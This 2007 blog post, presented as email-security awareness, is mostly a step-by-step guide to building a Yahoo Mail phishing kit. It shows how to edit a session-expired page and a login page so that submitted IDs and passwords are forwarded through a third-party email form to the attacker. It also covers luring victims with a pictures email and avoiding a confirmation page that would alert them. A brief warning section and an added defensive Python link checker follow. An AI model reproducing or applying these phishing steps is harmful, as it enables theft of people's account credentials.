Saturday, July 14, 2007

Learn to prevent your email password being hacked (part 2)

We need to modify the code of the 2 pages from the first part of this post. For the first page I'd recommend you delete all of the scripts. Here is the code without the scripts in it. Now we need to change the bottom-left link that says Re-login to Yahoo! Mail. To do that, look in your source code and locate the line:

<a href="http://mail.yahoo.com/?.done=http%3a%2f%2fus.f396.mail.yahoo.com%2fym%2flogin" target=_top>Re-login to Yahoo! Mail</a>

All you need to do is switch the address to the URL of your second page. For that you will need to think ahead and decide what it will be on your website. So the above line should look something like this:

<a href="http://login_page.yourdomain.com" target=_top>Re-login to Yahoo! Mail</a>

That's all there is to do about the first page, so let's move on to the second page (login page), where there is much to cover.

Locate the line:

<p class="yreglgsb"><input type="submit" name=".save" value="Sign In"></p>
This is the code for the Sign In button. We need to change this to redirect the person whose email password I want cracked to my pictures page. It should look like this:

<p class="yreglgsb"><input type="button" name=".save" value="Sign In" onclick="window.location.href='url'" </p>
where the url has to be the one from your pictures page.

Locate the line:

<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form">.
This line determines what happens to whatever the user inputs in the two fields on the right of the screen (if you look at the page in a web browser), the Yahoo! ID and the password fields. For now, when someone enters something in those two fields and clicks on the Sign In button, it tells Yahoo to search its database and authenticate them. We need to change that so that it sends whatever the user inputs there to our email. We have 2 possibilities to do that. The first would be to use a website that offers free email forms, and the second would be to get help from a php file that will trigger sending the email to your email address.

In the first case, if you want to use a website that offers free email forms, I would recommend that you take a look at the www.bravenet.com website, for it is a great website with many resources that will help you understand html better, and it also offers free website hosting. There is a small disadvantage in using this method. If you apply for a free membership, whenever you use their service it will first take you to a confirmation page, which is annoying and will ruin everyone's plan of finding someone else's email password using the method I'm presenting. I searched the Internet for more than 2 hours for a website that will host free email forms without demanding something in exchange (like links, banners etc). But if you consider upgrading your account with them, you will be able to use their service without having to place a link to your website right under the form, or a banner or something else that would ruin everything. If you are not that concerned about that, I will continue detailing what exactly needs to be done using the bravenet.com service. I registered for a free account and applied for an email form (contact form), and then I went for the "get the html code" option for it. Now, if you take a look at the first 3 lines from the generated code


<form method="post" enctype="multipart/form-data" action="http://pub19.bravenet.com/emailfwd/senddata.php">
<input type="hidden" name="usernum" value="xxxxxxxxxx">
<input type="hidden" name="cpv" value="2">

xxxxxxxxxx has to be your ID from when you registered with bravenet. It's a 10-digit number and you will have your own when you register.

you will see the first line looks a little bit like the code line we talked about earlier, the one that submits the Yahoo ID and the password to Yahoo for authentication. So if you go back to the source code of the second page (the login page) and once more locate the line


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form">


you will see they have the <form> tag in common. You need to replace this line with the 3 lines generated by bravenet for the email form and you are good to go. A reminder: after you load the new login page in a web browser and input the Yahoo ID and the password, right after you click the Sign In button it will redirect you to a page on the bravenet website that asks you to confirm the data that will be sent to your email. This email service from bravenet is very nice, and will also provide you with some other information like the IP of the computer, which is great for knowing where the person whose email you wanted revealed to you has fallen into the trap (if I may say so). So that confirmation page will pretty much ruin everyone's plan: the person who inputs their ID and password will be redirected to that page, and they will find it very fishy. So, once again, if you want the best of it, you might consider upgrading your account, and then you will have the option of not being redirected to that annoying page. In case none of them works out for you, you can try to get help from php to have the same process done, but this requires you to verify that your web host allows php. I will talk about including your php files on your website and testing them on your local machine in my next post.

Now, to summarize it all, you should have a website that contains:
main page = session_expires page with the Re-login to Yahoo! Mail link changed to your second page
second page = login page with the Sign In button that will direct you to the pictures page
third page = pictures page
They should all have different URLs.

All there is left to do is to compose an email that has the link to the main page attached. When someone wants to see your new pictures they will first access the main page (the one with the session expired message); that person will think they were somehow disconnected from Yahoo and will try to log in again using the Re-login to Yahoo! Mail link. The person will be directed to the login page and will enter the Yahoo ID and password, and when he/she clicks on the Sign In button an email with the inputted ID and password will be sent to your email address and at the same time the pictures page will load.

This is a method that can be countered very easily, and all the people out there reading my blog should know how to do this. The whole post brings me to this part, where I tell people that anyone can have his/her email password jacked with a simple method like the one I presented. You never know when someone will want to do this, and it's best to be aware of this kind of method so you will know how to keep your email safe and your privacy safer.

Yahoo should never take you to that session expired page unless you have been inactive for more than 24 hours, or if cookies are not enabled on your computer, or if you access multiple Yahoo accounts at the same time.

Most people do not always check the link bar located in the upper part of the browser. Here is an example. The eye is fixed on the contents of the web page and we often do not look up there to see the links. Emails are not always safe, so you should definitely always check the links whenever you open an email that has a link attached to it. I know that when you receive an email from a person you know and it has a link attached to it, you tend to trust that person and open the link without doubts, but you may never know for sure what is behind it.

In case your session with Yahoo somehow expires, this is the link you should see in your browser after you click on the Re-login to Yahoo! Mail link. I have talked mostly about Yahoo emails, but this applies to all the email hosts out there.
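The link check described above can also be done mechanically on a saved page or an HTML email. The following is an added example, not code from the original post: it flags a password form that posts outside the brand's domain and a link whose text names the brand while pointing elsewhere. The `lookalike.example` hosts, the `passwd` field name and the `BRAND_*` constants are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND_DOMAIN = "yahoo.com"  # assumption: the domain the real login lives under
BRAND_WORD = "yahoo"        # assumption: word a genuine link label would contain

def host_trusted(url):
    """True only if the URL's host is BRAND_DOMAIN or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return host == BRAND_DOMAIN or host.endswith("." + BRAND_DOMAIN)

class LoginPageAudit(HTMLParser):
    """Collects (finding, url) pairs for the two checks described above."""
    def __init__(self):
        super().__init__()
        self.findings, self._action, self._href, self._label = [], None, None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action = a.get("action") or ""
        elif tag == "a":
            self._href, self._label = a.get("href") or "", []
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            # A password field whose enclosing form posts off-domain.
            # Relative actions count as off-domain: the page URL is unknown here.
            if self._action is not None and not host_trusted(self._action):
                self.findings.append(("password-form-offsite", self._action))

    def handle_data(self, data):
        if self._href is not None:
            self._label.append(data)

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None
        elif tag == "a" and self._href is not None:
            # Link text names the brand but the target is somewhere else.
            if BRAND_WORD in "".join(self._label).lower() and not host_trusted(self._href):
                self.findings.append(("brand-link-offsite", self._href))
            self._href = None

def audit(html):
    parser = LoginPageAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed samples: the genuine one reuses the link and form targets quoted in the post.
GENUINE = ('<a href="http://mail.yahoo.com/?.done=x" target=_top>Re-login to Yahoo! Mail</a>'
           '<form method="post" action="https://login.yahoo.com/config/login?">'
           '<input type="password" name="passwd"></form>')
LOOKALIKE = ('<a href="http://login.lookalike.example/" target=_top>Re-login to Yahoo! Mail</a>'
             '<form method="post" action="http://forms.lookalike.example/send">'
             '<input type="password" name="passwd"></form>')
```

`audit(GENUINE)` returns an empty list, while `audit(LOOKALIKE)` returns both findings. The suffix match requires a leading dot, so a host such as `yahoo.com.lookalike.example` is not treated as trusted.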

            So stay on guard, and keep your emails just for yourself !


Link to the 1st part of this post

